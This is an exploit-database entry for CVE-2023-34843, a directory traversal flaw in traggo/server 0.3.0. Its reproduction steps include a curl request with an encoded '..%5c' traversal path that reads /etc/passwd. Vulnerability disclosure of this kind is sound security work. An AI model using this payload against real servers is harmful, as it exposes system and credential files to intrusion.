Share
## https://sploitus.com/exploit?id=8243D70C-D50A-5E2D-8542-ED7B221B1B5A
# CVE-2023-34843

traggo/server version 0.3.0 is vulnerable to directory traversal. 


Steps to reproduce:

1. Setup traggo/server on your endpoint/server. 
https://traggo.net/install/

2. Make a GET request to the following URL. 
curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd

3. View contents of /etc/passwd